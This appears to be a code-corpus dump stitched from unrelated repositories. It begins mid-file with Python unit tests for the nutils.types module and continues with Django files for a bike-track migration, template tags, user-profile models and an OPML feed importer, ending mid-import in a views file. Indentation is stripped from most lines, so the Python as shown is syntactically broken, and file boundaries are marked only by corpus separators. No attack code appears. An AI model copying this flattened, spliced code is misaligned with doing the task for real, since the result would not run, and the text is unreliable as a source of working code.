self.assertEqual(nutils.types.nutils_hash(2+1j).hex(), 'ee088890528f941a80aa842dad36591b05253e55')
def test_inequality_numbers(self):
self.assertNotEqual(nutils.types.nutils_hash(1).hex(), nutils.types.nutils_hash(1.).hex())
self.assertNotEqual(nutils.types.nutils_hash(1).hex(), nutils.types.nutils_hash(1+0j).hex())
self.assertNotEqual(nutils.types.nutils_hash(1).hex(), nutils.types.nutils_hash(True).hex())
def test_str(self):
self.assertEqual(nutils.types.nutils_hash('spam').hex(), '3ca1023ab75a68dc7b0f83b43ec624704a7aef61')
self.assertEqual(nutils.types.nutils_hash('eggs').hex(), '124b0a7b3984e08125c380f7454896c1cad22e2c')
def test_bytes(self):
self.assertEqual(nutils.types.nutils_hash(b'spam').hex(), '5e717ec15aace7c25610c1dea340f2173f2df014')
self.assertEqual(nutils.types.nutils_hash(b'eggs').hex(), '98f2061978497751cac94f982fd96d9b015b74c3')
def test_tuple(self):
self.assertEqual(nutils.types.nutils_hash(()).hex(), '15d44755bf0731b2a3e9a5c5c8e0807b61881a1f')
self.assertEqual(nutils.types.nutils_hash((1,)).hex(), '328b16ebbc1815cf579ae038a35c4d68ebb022af')
self.assertNotEqual(nutils.types.nutils_hash((1,'spam')).hex(), nutils.types.nutils_hash(('spam',1)).hex())
def test_frozenset(self):
self.assertEqual(nutils.types.nutils_hash(frozenset([1,2])).hex(), '3862dc7e5321bc8a576c385ed2c12c71b96a375a')
self.assertEqual(nutils.types.nutils_hash(frozenset(['spam','eggs'])).hex(), '2c75fd3db57f5e505e1425ae9ff6dcbbc77fd123')
def test_type_bool(self):
self.assertEqual(nutils.types.nutils_hash(bool).hex(), 'feb912889d52d45fcd1e778c427b093a19a1ea78')
def test_type_int(self):
self.assertEqual(nutils.types.nutils_hash(int).hex(), 'aa8cb9975f7161b1f7ceb88b4b8585b49946b31e')
def test_type_float(self):
self.assertEqual(nutils.types.nutils_hash(float).hex(), '6d5079a53075f4b6f7710377838d8183730f1388')
def test_type_complex(self):
self.assertEqual(nutils.types.nutils_hash(complex).hex(), '6b00f6b9c6522742fd3f8054af6f10a24a671fff')
def test_type_str(self):
self.assertEqual(nutils.types.nutils_hash(str).hex(), '2349e11586163208d2581fe736630f4e4b680a7b')
def test_type_bytes(self):
self.assertEqual(nutils.types.nutils_hash(bytes).hex(), 'b0826ca666a48739e6f8b968d191adcefaa39670')
def test_type_tuple(self):
self.assertEqual(nutils.types.nutils_hash(tuple).hex(), '07cb4a24ca8ac53c820f20721432b4726e2ad1af')
def test_type_frozenset(self):
self.assertEqual(nutils.types.nutils_hash(frozenset).hex(), '48dc7cd0fbd54924498deb7c68dd363b4049f5e2')
def test_custom(self):
class custom:
@property
def __nutils_hash__(self):
return b'01234567890123456789'
self.assertEqual(nutils.types.nutils_hash(custom()).hex(), b'01234567890123456789'.hex())
def test_unhashable(self):
with self.assertRaises(TypeError):
nutils.types.nutils_hash([])
class CacheMeta(TestCase):
def test_property(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = 'x',
@property
def x(self):
nonlocal ncalls
ncalls += 1
return 1
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.x, 1)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x, 1)
self.assertEqual(ncalls, 1)
def test_set_property(self):
class T(metaclass=nutils.types.CacheMeta):
__cache__ = 'x',
@property
def x(self):
return 1
t = T()
with self.assertRaises(AttributeError):
t.x = 1
def test_del_property(self):
class T(metaclass=nutils.types.CacheMeta):
__cache__ = 'x',
@property
def x(self):
return 1
t = T()
with self.assertRaises(AttributeError):
del t.x
def test_method_without_args(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = 'x',
def x(self):
nonlocal ncalls
ncalls += 1
return 1
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.x(), 1)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(), 1)
self.assertEqual(ncalls, 1)
def test_method_with_args(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = 'x',
def x(self, a, b):
nonlocal ncalls
ncalls += 1
return a + b
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.x(1, 2), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(a=1, b=2), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(2, 2), 4)
self.assertEqual(ncalls, 2)
self.assertEqual(t.x(a=2, b=2), 4)
self.assertEqual(ncalls, 2)
self.assertEqual(t.x(1, 2), 3)
self.assertEqual(ncalls, 3)
def test_method_with_args_and_preprocessors(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = 'x',
@nutils.types.apply_annotations
def x(self, a:int, b:int):
nonlocal ncalls
ncalls += 1
return a + b
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.x(1, 2), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(a='1', b='2'), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x('2', '2'), 4)
self.assertEqual(ncalls, 2)
self.assertEqual(t.x(a=2, b=2), 4)
self.assertEqual(ncalls, 2)
self.assertEqual(t.x('1', 2), 3)
self.assertEqual(ncalls, 3)
def test_method_with_kwargs(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = 'x',
def x(self, a, **kwargs):
nonlocal ncalls
ncalls += 1
return a + sum(kwargs.values())
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.x(1, b=2), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(a=1, b=2), 3)
self.assertEqual(ncalls, 1)
self.assertEqual(t.x(1, b=2, c=3), 6)
self.assertEqual(ncalls, 2)
self.assertEqual(t.x(a=1, b=2, c=3), 6)
self.assertEqual(ncalls, 2)
def test_subclass_redefined_property(self):
class T(metaclass=nutils.types.CacheMeta):
__cache__ = 'x',
@property
def x(self):
return 1
class U(T):
__cache__ = 'x',
@property
def x(self):
return super().x + 1
@property
def y(self):
return super().x
u1 = U()
self.assertEqual(u1.x, 2)
self.assertEqual(u1.y, 1)
u2 = U()
self.assertEqual(u2.y, 1)
self.assertEqual(u2.x, 2)
def test_missing_attribute(self):
with self.assertRaisesRegex(TypeError, 'Attribute listed in __cache__ is undefined: x'):
class T(metaclass=nutils.types.CacheMeta):
__cache__ = 'x',
def test_invalid_attribute(self):
with self.assertRaisesRegex(TypeError, "Don't know how to cache attribute x: None"):
class T(metaclass=nutils.types.CacheMeta):
__cache__ = 'x',
x = None
def test_name_mangling(self):
for withslots in False, True:
with self.subTest(withslots=withslots):
class T(metaclass=nutils.types.CacheMeta):
if withslots:
__slots__ = ()
__cache__ = '__x',
@property
def __x(self):
nonlocal ncalls
ncalls += 1
return 1
@property
def y(self):
return self.__x
ncalls = 0
t = T()
self.assertEqual(ncalls, 0)
self.assertEqual(t.y, 1)
self.assertEqual(ncalls, 1)
self.assertEqual(t.y, 1)
self.assertEqual(ncalls, 1)
class strictint(TestCase):
def test_int(self):
value = nutils.types.strictint(1)
self.assertEqual(value, 1)
self.assertEqual(type(value), int)
def test_numpy_int(self):
value = nutils.types.strictint(numpy.int64(1))
self.assertEqual(value, 1)
self.assertEqual(type(value), int)
def test_float(self):
with self.assertRaises(ValueError):
nutils.types.strictint(1.)
def test_numpy_float(self):
with self.assertRaises(ValueError):
nutils.types.strictint(numpy.float64(1.))
def test_complex(self):
with self.assertRaises(ValueError):
nutils.types.strictint(1+0j)
def test_str(self):
with self.assertRaises(ValueError):
nutils.types.strictint('1')
class strictfloat(TestCase):
def test_int(self):
value = nutils.types.strictfloat(1)
self.assertEqual(value, 1.)
self.assertEqual(type(value), float)
def test_numpy_int(self):
value = nutils.types.strictfloat(numpy.int64(1))
self.assertEqual(value, 1.)
self.assertEqual(type(value), float)
def test_float(self):
value = nutils.types.strictfloat(1.)
self.assertEqual(value, 1.)
self.assertEqual(type(value), float)
def test_numpy_float(self):
value = nutils.types.strictfloat(numpy.float64(1.))
self.assertEqual(value, 1.)
self.assertEqual(type(value), float)
def test_complex(self):
with self.assertRaises(ValueError):
      nutils.types.strictfloat(1+0j)
def test_str(self):
with self.assertRaises(ValueError):
nutils.types.strictfloat('1.')
class strictstr(TestCase):
def test_str(self):
value = nutils.types.strictstr('spam')
self.assertEqual(value, 'spam')
self.assertEqual(type(value), str)
def test_int(self):
with self.assertRaises(ValueError):
nutils.types.strictstr(1)
class strict(TestCase):
def test_valid(self):
self.assertEqual(nutils.types.strict[int](1), 1)
def test_invalid(self):
with self.assertRaises(ValueError):
nutils.types.strict[int]('1')
def test_call(self):
with self.assertRaises(TypeError):
nutils.types.strict()
class tupletype(TestCase):
def test_valid1(self):
value = nutils.types.tuple[nutils.types.strictint]([])
self.assertEqual(value, ())
self.assertEqual(type(value), tuple)
def test_valid2(self):
value = nutils.types.tuple[nutils.types.strictint]([1,2,3])
self.assertEqual(value, (1,2,3))
self.assertEqual(type(value), tuple)
def test_invalid(self):
with self.assertRaises(ValueError):
nutils.types.tuple[nutils.types.strictint]([1, 'spam','eggs'])
def test_without_item_constructor(self):
src = 1,2,3
self.assertEqual(nutils.types.tuple(src), tuple(src))
def test_name(self):
self.assertEqual(nutils.types.tuple[nutils.types.strictint].__name__, 'tuple[nutils.types.strictint]')
class frozendict(TestCase):
def test_constructor(self):
src = {'spam': 1, 'eggs': 2.3}
for name, value in [('mapping', src), ('mapping_view', src.items()), ('iterable', (item for item in src.items())), ('frozendict', nutils.types.frozendict(src))]:
with self.subTest(name):
frozen = nutils.types.frozendict(value)
self.assertIsInstance(frozen, nutils.types.frozendict)
self.assertEqual(dict(frozen), src)
def test_constructor_invalid(self):
with self.assertRaises(ValueError):
nutils.types.frozendict(['spam', 'eggs', 1])
def test_clsgetitem(self):
T = nutils.types.frozendict[str, float]
src = {1: 2, 'spam': '2.3'}
for name, value in [('mapping', src), ('mapping_view', src.items()), ('iterable', (item for item in src.items()))]:
with self.subTest(name):
frozen = T(value)
self.assertIsInstance(frozen, nutils.types.frozendict)
self.assertEqual(dict(frozen), {'1': 2., 'spam': 2.3})
def test_clsgetitem_invalid_types(self):
with self.assertRaises(RuntimeError):
nutils.types.frozendict[str, float, bool]
def test_clsgetitem_invalid_value(self):
T = nutils.types.frozendict[str, float]
with self.assertRaises(ValueError):
T(1)
def test_setitem(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
with self.assertRaises(TypeError):
frozen['eggs'] = 3
def test_delitem(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
with self.assertRaises(TypeError):
del frozen['eggs']
def test_getitem_existing(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
self.assertEqual(frozen['spam'], 1)
def test_getitem_nonexisting(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
with self.assertRaises(KeyError):
frozen['foo']
def test_contains(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
self.assertIn('spam', frozen)
self.assertNotIn('foo', frozen)
def test_iter(self):
src = {'spam': 1, 'eggs': 2.3}
frozen = nutils.types.frozendict(src)
self.assertEqual(frozenset(frozen), frozenset(src))
def test_len(self):
src = {'spam': 1, 'eggs': 2.3}
frozen = nutils.types.frozendict(src)
self.assertEqual(len(frozen), len(src))
def test_hash(self):
src = {'spam': 1, 'eggs': 2.3}
self.assertEqual(hash(nutils.types.frozendict(src)), hash(nutils.types.frozendict(src)))
def test_copy(self):
src = {'spam': 1, 'eggs': 2.3}
copy = nutils.types.frozendict(src).copy()
self.assertIsInstance(copy, dict)
self.assertEqual(copy, src)
def test_pickle(self):
src = {'spam': 1, 'eggs': 2.3}
frozen = pickle.loads(pickle.dumps(nutils.types.frozendict(src)))
self.assertIsInstance(frozen, nutils.types.frozendict)
self.assertEqual(dict(frozen), src)
def test_eq_same_id(self):
src = {'spam': 1, 'eggs': 2.3}
a = nutils.types.frozendict(src)
self.assertEqual(a, a)
def test_eq_other_id(self):
src = {'spam': 1, 'eggs': 2.3}
a = nutils.types.frozendict(src)
b = nutils.types.frozendict(src)
self.assertEqual(a, b)
def test_eq_deduplicated(self):
src = {'spam': 1, 'eggs': 2.3}
a = nutils.types.frozendict(src)
b = nutils.types.frozendict(src)
a == b # this replaces `a.__base` with `b.__base`
self.assertEqual(a, b)
def test_ineq_frozendict(self):
src = {'spam': 1, 'eggs': 2.3}
self.assertNotEqual(nutils.types.frozendict(src), nutils.types.frozendict({'spam': 1}))
def test_ineq_dict(self):
src = {'spam': 1, 'eggs': 2.3}
self.assertNotEqual(nutils.types.frozendict(src), src)
def test_nutils_hash(self):
frozen = nutils.types.frozendict({'spam': 1, 'eggs': 2.3})
self.assertEqual(nutils.types.nutils_hash(frozen).hex(), '8cf14f109e54707af9c2e66d7d3cdb755cce8243')
class frozenmultiset(TestCase):
def test_constructor(self):
src = 'spam', 'bacon', 'sausage', 'spam'
for name, value in [('tuple', src), ('frozenmultiset', nutils.types.frozenmultiset(src))]:
with self.subTest(name=name):
frozen = nutils.types.frozenmultiset(value)
        self.assertEqual({k: tuple(frozen).count(k) for k in set(src)}, {'spam':2, 'bacon':1, 'sausage':1})
def test_clsgetitem(self):
src = False, 1, numpy.int64(2)
frozen = nutils.types.frozenmultiset[nutils.types.strictint](src)
self.assertEqual(set(frozen), {0, 1, 2})
def test_preserve_order(self):
for src in [('spam', 'bacon', 'sausage', 'spam'), ('spam', 'egg', 'spam', 'spam', 'bacon', 'spam')]:
with self.subTest(src=src):
self.assertEqual(tuple(nutils.types.frozenmultiset(src)), src)
def test_and(self):
for l, r, lar in [[['spam', 'eggs'], ['spam', 'spam', 'eggs'], ['spam', 'eggs']],
[['spam'], ['eggs'], []],
[['spam','spam']]*3]:
with self.subTest(l=l, r=r, lar=lar):
self.assertEqual(nutils.types.frozenmultiset(l)&nutils.types.frozenmultiset(r), nutils.types.frozenmultiset(lar))
with self.subTest(l=r, r=l, lar=lar):
self.assertEqual(nutils.types.frozenmultiset(r)&nutils.types.frozenmultiset(l), nutils.types.frozenmultiset(lar))
def test_sub(self):
for l, r, lmr, rml in [[['spam', 'eggs'], ['spam', 'spam', 'eggs'], [], ['spam']],
[['spam'], ['eggs'], ['spam'], ['eggs']],
[['spam'], ['spam'], [], []]]:
with self.subTest(l=l, r=r, lmr=lmr):
self.assertEqual(nutils.types.frozenmultiset(l)-nutils.types.frozenmultiset(r), nutils.types.frozenmultiset(lmr))
with self.subTest(l=r, r=l, lmr=rml):
self.assertEqual(nutils.types.frozenmultiset(r)-nutils.types.frozenmultiset(l), nutils.types.frozenmultiset(rml))
def test_pickle(self):
src = 'spam', 'bacon', 'sausage', 'spam'
frozen = pickle.loads(pickle.dumps(nutils.types.frozenmultiset(src)))
self.assertIsInstance(frozen, nutils.types.frozenmultiset)
self.assertEqual(frozen, nutils.types.frozenmultiset(src))
def test_hash(self):
src = 'spam', 'bacon', 'sausage', 'spam'
ref = nutils.types.frozenmultiset(src)
for perm in itertools.permutations(src):
with self.subTest(perm=perm):
self.assertEqual(hash(nutils.types.frozenmultiset(src)), hash(ref))
def test_nutils_hash(self):
for perm in itertools.permutations(('spam', 'bacon', 'sausage', 'spam')):
with self.subTest(perm=perm):
frozen = nutils.types.frozenmultiset(perm)
self.assertEqual(nutils.types.nutils_hash(frozen).hex(), 'f3fd9c6d4741af2e67973457ee6308deddcb714c')
def test_eq(self):
src = 'spam', 'bacon', 'sausage', 'spam'
ref = nutils.types.frozenmultiset(src)
for perm in itertools.permutations(src):
with self.subTest(perm=perm):
self.assertEqual(nutils.types.frozenmultiset(src), ref)
def test_contains(self):
src = 'spam', 'bacon', 'sausage', 'spam'
frozen = nutils.types.frozenmultiset(src)
for item in 'spam', 'bacon', 'eggs':
with self.subTest(item=item):
if item in src:
self.assertIn(item, frozen)
else:
self.assertNotIn(item, frozen)
def test_len(self):
src = 'spam', 'bacon', 'sausage', 'spam'
frozen = nutils.types.frozenmultiset(src)
self.assertEqual(len(frozen), len(src))
def test_nonzero(self):
self.assertTrue(nutils.types.frozenmultiset(['spam', 'eggs']))
self.assertFalse(nutils.types.frozenmultiset([]))
def test_add(self):
l = nutils.types.frozenmultiset(['spam', 'bacon'])
r = nutils.types.frozenmultiset(['sausage', 'spam'])
lpr = nutils.types.frozenmultiset(['spam', 'bacon', 'sausage', 'spam'])
self.assertEqual(l+r, lpr)
def test_isdisjoint(self):
for l, r, disjoint in [[['spam', 'eggs'], ['spam', 'spam', 'eggs'], False],
[['spam'], ['eggs'], True],
[['spam'], ['spam'], False]]:
with self.subTest(l=l, r=r, disjoint=disjoint):
self.assertEqual(nutils.types.frozenmultiset(l).isdisjoint(nutils.types.frozenmultiset(r)), disjoint)
class frozenarray(TestCase):
def _test_constructor(self, src, frozen_dtype):
src = list(src)
for copy in True, False:
for src_type in list, numpy.array, nutils.types.frozenarray:
with self.subTest(copy=copy, src_type=src_type):
frozen = nutils.types.frozenarray(src_type(src), copy=copy, dtype=frozen_dtype)
self.assertIsInstance(frozen, nutils.types.frozenarray)
self.assertEqual(frozen.tolist(), src)
def _test_constructor_raises(self, src, frozen_dtype, exc_type, exc_regex):
src = list(src)
for copy in True, False:
for src_type in list, numpy.array, nutils.types.frozenarray:
with self.subTest(copy=copy, src_type=src_type), self.assertRaisesRegex(exc_type, exc_regex):
nutils.types.frozenarray(src_type(src), copy=copy, dtype=frozen_dtype)
def test_constructor_bool(self):
self._test_constructor((False, True), bool)
def test_constructor_int(self):
self._test_constructor((0,1), int)
def test_constructor_int_upcast(self):
self._test_constructor((False,True), int)
def test_constructor_int_downcast(self):
self._test_constructor((0.,1.), int)
def test_constructor_float(self):
self._test_constructor((0.,1.), float)
def test_constructor_float_upcast(self):
self._test_constructor((0,1), float)
def test_constructor_float_downcast(self):
src = [0.+0j,1.+0j]
for copy in True, False:
with self.subTest(copy=copy, src_type=list), self.assertRaises(TypeError):
nutils.types.frozenarray(src, copy=copy, dtype=float)
for src_type in numpy.array, nutils.types.frozenarray:
with self.subTest(copy=copy, src_type=src_type), self.assertWarns(numpy.ComplexWarning):
nutils.types.frozenarray(src_type(src), copy=copy, dtype=float)
def test_constructor_complex(self):
self._test_constructor((0+0j,1+1j), complex)
def test_constructor_strictint(self):
self._test_constructor((0,1), nutils.types.strictint)
def test_constructor_strictint_upcast(self):
self._test_constructor((False,True), nutils.types.strictint)
def test_constructor_strictint_downcast(self):
self._test_constructor_raises((0.,1.), nutils.types.strictint, ValueError, '^downcasting .* is forbidden$')
def test_constructor_strictfloat(self):
self._test_constructor((0.,1.), nutils.types.strictfloat)
def test_constructor_strictfloat_upcast(self):
self._test_constructor((0,1), nutils.types.strictfloat)
def test_constructor_strictfloat_downcast(self):
self._test_constructor_raises((0.+0j,1.+0j), nutils.types.strictfloat, ValueError, '^downcasting .* is forbidden$')
def test_constructor_invalid_dtype(self):
self._test_constructor_raises((0,1), list, ValueError, '^unsupported dtype:')
def test_clsgetitem(self):
src = [0.,1.]
frozen = nutils.types.frozenarray[nutils.types.strictfloat](src)
self.assertIsInstance(frozen, nutils.types.frozenarray)
self.assertEqual(frozen.tolist(), src)
def test_clsgetitem_invalid(self):
src = [0.,1.]
with self.assertRaises(ValueError):
nutils.types.frozenarray[nutils.types.strictint](src)
def test_nutils_hash(self):
a = nutils.types.frozenarray(numpy.array([[1,2],[3,4]], numpy.int64))
b = nutils.types.frozenarray(numpy.array([[1,3],[2,4]], numpy.int64))
self.assertNotEqual(nutils.types.nutils_hash(a).hex(), nutils.types.nutils_hash(b).hex())
self.assertEqual(nutils.types.nutils_hash(a).hex(), nutils.types.nutils_hash(b.T).hex())
self.assertEqual(nutils.types.nutils_hash(a).hex(), '42cc3a5e1216c1f0a9921a61a3a2c67025c98d69')
self.assertEqual(nutils.types.nutils_hash(b).hex(), '8f0c9f9a118c42c258f1e69e374aadda99b4be97')
def test_pickle(self):
src = [[1,2],[3,4]]
value = pickle.loads(pickle.dumps(nutils.types.frozenarray(src)))
self.assertIsInstance(value, nutils.types.frozenarray)
self.assertEqual(value, nutils.types.frozenarray(src))
def test_eq_same_instance(self):
a = nutils.types.frozenarray([[1,2],[3,4]], int)
self.assertEqual(a, a)
def test_eq_not_frozenarray(self):
a = nutils.types.frozenarray([[1,2],[3,4]], int)
self.assertNotEqual(a, [[1,2],[3,4]])
def test_eq_same_base(self):
base = numpy.array([[1,2],[3,4]], int)
a = nutils.types.frozenarray(base, copy=False)
b = nutils.types.frozenarray(base, copy=False)
self.assertEqual(a, b)
def test_eq_different_array(self):
a = nutils.types.frozenarray([[1,2],[3,4]], int)
b = nutils.types.frozenarray([[1,3],[2,4]], int)
self.assertNotEqual(a, b)
def test_eq_different_dtype(self):
a = nutils.types.frozenarray([[1,2],[3,4]], int)
b = nutils.types.frozenarray([[1,2],[3,4]], float)
self.assertNotEqual(a, b)
def test_eq_different_base(self):
a = nutils.types.frozenarray([[1,2],[3,4]], int)
b = nutils.types.frozenarray([[1,2],[3,4]], int)
self.assertEqual(a, b)
def test_ineq_equal(self):
l = nutils.types.frozenarray([1,2], int)
r = nutils.types.frozenarray([1,2], int)
self.assertFalse(l < r)
self.assertTrue(l <= r)
self.assertFalse(l > r)
self.assertTrue(l >= r)
def test_ineq_smaller(self):
l = nutils.types.frozenarray([1,2], int)
r = nutils.types.frozenarray([2,1], int)
self.assertTrue(l < r)
self.assertTrue(l <= r)
self.assertFalse(l > r)
self.assertFalse(l >= r)
def test_ineq_larger(self):
l = nutils.types.frozenarray([2,1], int)
r = nutils.types.frozenarray([1,2], int)
self.assertFalse(l < r)
self.assertFalse(l <= r)
self.assertTrue(l > r)
self.assertTrue(l >= r)
def test_ineq_incomparable(self):
array = nutils.types.frozenarray([1,2], int)
for op in operator.lt, operator.le, operator.gt, operator.ge:
with self.subTest(op=op), self.assertRaises(TypeError):
op(array, 1)
def test_full(self):
self.assertEqual(nutils.types.frozenarray.full([2,3], 1.5), nutils.types.frozenarray([[1.5]*3]*2, float))
def test_as_numpy_array(self):
a = numpy.array(nutils.types.frozenarray([1,2]))
self.assertIsInstance(a, numpy.ndarray)
class c_array(TestCase):
def test_idempotence(self):
a = numpy.array([1,2,3], dtype=numpy.int64)
P = nutils.types.c_array[numpy.int64]
a_ct = P(a)
self.assertEqual(P(a_ct), a_ct)
def test_list(self):
a = [1,2,3]
a_ct = nutils.types.c_array[numpy.int64](a)
self.assertEqual(a_ct.data_as(ctypes.POINTER(ctypes.c_int64)).contents.value, 1)
def test_array(self):
a = numpy.array([1,2,3], dtype=numpy.int64)
a_ct = nutils.types.c_array[numpy.int64](a)
self.assertEqual(a_ct.data_as(ctypes.POINTER(ctypes.c_int64)).contents.value, 1)
def test_array_invalid_dtype(self):
a = numpy.array([1,2,3], dtype=numpy.int32)
with self.assertRaisesRegex(ValueError, '^Expected dtype .* but array has dtype .*\\.$'):
a_ct = nutils.types.c_array[numpy.int64](a)
  def test_array_noncontiguous(self):
    a = numpy.array([[1,2],[3,4]], dtype=numpy.int64).T
with self.assertRaisesRegex(ValueError, '^Array is not contiguous\\.$'):
a_ct = nutils.types.c_array[numpy.int64](a)
def test_wo_getitem(self):
with self.assertRaises(TypeError):
nutils.types.c_array()
class T_Immutable(nutils.types.Immutable):
def __init__(self, x, y):
pass
class T_Singleton(nutils.types.Singleton):
def __init__(self, x, y):
pass
@parametrize
class ImmutableFamily(TestCase):
def test_pickle(self):
T = {nutils.types.Immutable: T_Immutable, nutils.types.Singleton: T_Singleton}[self.cls]
a = T(1, 2)
b = pickle.loads(pickle.dumps(a))
self.assertEqual(a, b)
def test_eq(self):
class T(self.cls):
def __init__(self, x, y):
pass
class U(self.cls):
def __init__(self, x, y):
pass
self.assertEqual(T(1, 2), T(1, 2))
self.assertNotEqual(T(1, 2), T(2, 1))
self.assertNotEqual(T(1, 2), U(1, 2))
def test_canonical_args(self):
class T(self.cls):
def __init__(self, x, y, z=3):
pass
self.assertEqual(T(x=1, y=2), T(1, 2, 3))
def test_preprocessors(self):
class T(self.cls):
@nutils.types.apply_annotations
def __init__(self, x: int):
pass
self.assertEqual(T(1), T('1'))
self.assertEqual(T(1), T(x='1'))
def test_nutils_hash(self):
class T(self.cls):
def __init__(self, x, y):
pass
class T1(self.cls, version=1):
def __init__(self, x, y):
pass
class U(self.cls):
def __init__(self, x, y):
pass
self.assertEqual(nutils.types.nutils_hash(T(1, 2)).hex(), nutils.types.nutils_hash(T(1, 2)).hex())
self.assertNotEqual(nutils.types.nutils_hash(T(1, 2)).hex(), nutils.types.nutils_hash(T(2, 1)).hex())
self.assertNotEqual(nutils.types.nutils_hash(T(1, 2)).hex(), nutils.types.nutils_hash(U(1, 2)).hex())
# Since the hash does not include base classes, the hashes of Immutable and Singleton are the same.
self.assertEqual(nutils.types.nutils_hash(T(1, 2)).hex(), '8c3ba8f0d9eb054ab192f4e4e2ba7442564bdf85')
self.assertEqual(nutils.types.nutils_hash(T1(1, 2)).hex(), 'bab4ee65b5189f544a4242f0e386af76cfa6e31d')
@parametrize.enable_if(lambda cls: cls is nutils.types.Singleton)
def test_deduplication(self):
class T(self.cls):
def __init__(self, x, y):
pass
class U(self.cls):
def __init__(self, x, y):
pass
a = T(1, 2)
b = T(1, 2)
c = T(2, 1)
d = U(1, 2)
self.assertIs(a, b)
self.assertEqual(a, b)
self.assertIsNot(a, c)
self.assertNotEqual(a, c)
self.assertIsNot(a, d)
self.assertNotEqual(a, d)
ImmutableFamily(cls=nutils.types.Immutable)
ImmutableFamily(cls=nutils.types.Singleton)
# vim:shiftwidth=2:softtabstop=2:expandtab:foldmethod=indent:foldnestmax=2
``` |
{
"source": "jochenklar/bike",
"score": 2
} |
#### File: tracks/migrations/0004_data_migration.py
```python
from __future__ import unicode_literals
import json
from django.db import migrations
from ..utils import parse_file
def run_data_migration(apps, schema_editor):
Track = apps.get_model('tracks', 'Track')
NewTrack = apps.get_model('tracks', 'NewTrack')
for track in Track.objects.order_by('timestamp'):
new_track = NewTrack(file=track.track, name=track.name or track.track.name)
track_data = parse_file(new_track.file)
if track_data:
new_track.start_time = track_data['start_time']
new_track.end_time = track_data['end_time']
new_track.distance = track_data['distance']
new_track.geojson = json.dumps(track_data['geojson'])
new_track.save()
class Migration(migrations.Migration):
dependencies = [
('tracks', '0003_newtrack')
]
operations = [
migrations.RunPython(run_data_migration),
]
``` |
{
"source": "jochenklar/caipirinha",
"score": 2
} |
#### File: core/templatetags/core_tags.py
```python
from django import template
from django.conf import settings
from django.core.urlresolvers import reverse
register = template.Library()
@register.simple_tag(takes_context=True)
def login_link(context):
if context.request.user.is_authenticated():
url = settings.LOGOUT_URL
text = 'Logout'
else:
url = settings.LOGIN_URL
text = 'Login'
return "<a href=\"%s\">%s</a>" % (url,text)
@register.simple_tag()
def internal_link(url, text):
return "<a href=\"%s\">%s</a>" % (url,text)
```
#### File: caipirinha/users/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from jsonfield import JSONField
class DetailKey(models.Model):
TYPE_CHOICES = (
('text', 'Input field'),
('textarea', 'Textarea field'),
('checkbox', 'Checkbox'),
('radio', 'Radio button'),
('select', 'Select field'),
('multiselect', 'Multiselect field'),
)
name = models.SlugField()
type = models.CharField(max_length=8,choices=TYPE_CHOICES)
hint = models.TextField(blank=True)
options = JSONField()
required = models.BooleanField()
def __unicode__(self):
return self.name
class Profile(models.Model):
user = models.ForeignKey(User, related_name='details')
details = JSONField()
def __unicode__(self):
return '%s' % self.user.username
``` |
{
"source": "jochenklar/reader2",
"score": 2
} |
#### File: reader2/feeds/exceptions.py
```python
class FeedException(Exception):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message')
```
#### File: management/commands/loadopml.py
```python
from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
import xml.etree.ElementTree as et
from feeds.models import Category, Subscription, Feed, Meta
class Command(BaseCommand):
help = 'Imports categories and subscriptions from an OPML file.'
def add_arguments(self, parser):
parser.add_argument('username', help='Import feeds for this user')
parser.add_argument('opmlfile', help='OPML file')
def handle(self, *args, **options):
try:
user = User.objects.get(username=options['username'])
except (IndexError, User.DoesNotExist):
raise CommandError('No valid username given.')
try:
xml = et.parse(options['opmlfile'])
except (IndexError, IOError):
raise CommandError('No valid inputfile given.')
for categoryNode in xml.find('body').findall('outline'):
categoryTitle = categoryNode.attrib['title']
print(' category %s' % categoryTitle)
try:
category = Category.objects.get(title=categoryTitle,user=user)
except Category.DoesNotExist:
category = Category(title=categoryTitle,user=user)
category.save()
for subscriptionNode in categoryNode.findall('outline'):
subscriptionTitle = subscriptionNode.attrib['title']
subscriptionXmlUrl = subscriptionNode.attrib['xmlUrl']
print(' subscription %s' % subscriptionTitle)
try:
feed = Feed.objects.get(xmlUrl=subscriptionXmlUrl)
except Feed.DoesNotExist:
feed = Feed(xmlUrl=subscriptionXmlUrl)
feed.fetchItems()
feed.save()
try:
subscription = Subscription.objects.get(category=category,feed=feed)
except Subscription.DoesNotExist:
subscription = Subscription(category=category,feed=feed)
subscription.save()
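# Illustrative invocation (assumption): import an OPML export for an existing user, e.g.
#
#   python manage.py loadopml alice subscriptions.opml
#
# Categories, feeds and subscriptions that already exist are reused rather than duplicated.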
```
#### File: reader2/reader/views.py
```python
from django.shortcuts import render
from django.http import HttpResponseRedirect
from django.contrib.auth import authenticate as auth_authenticate
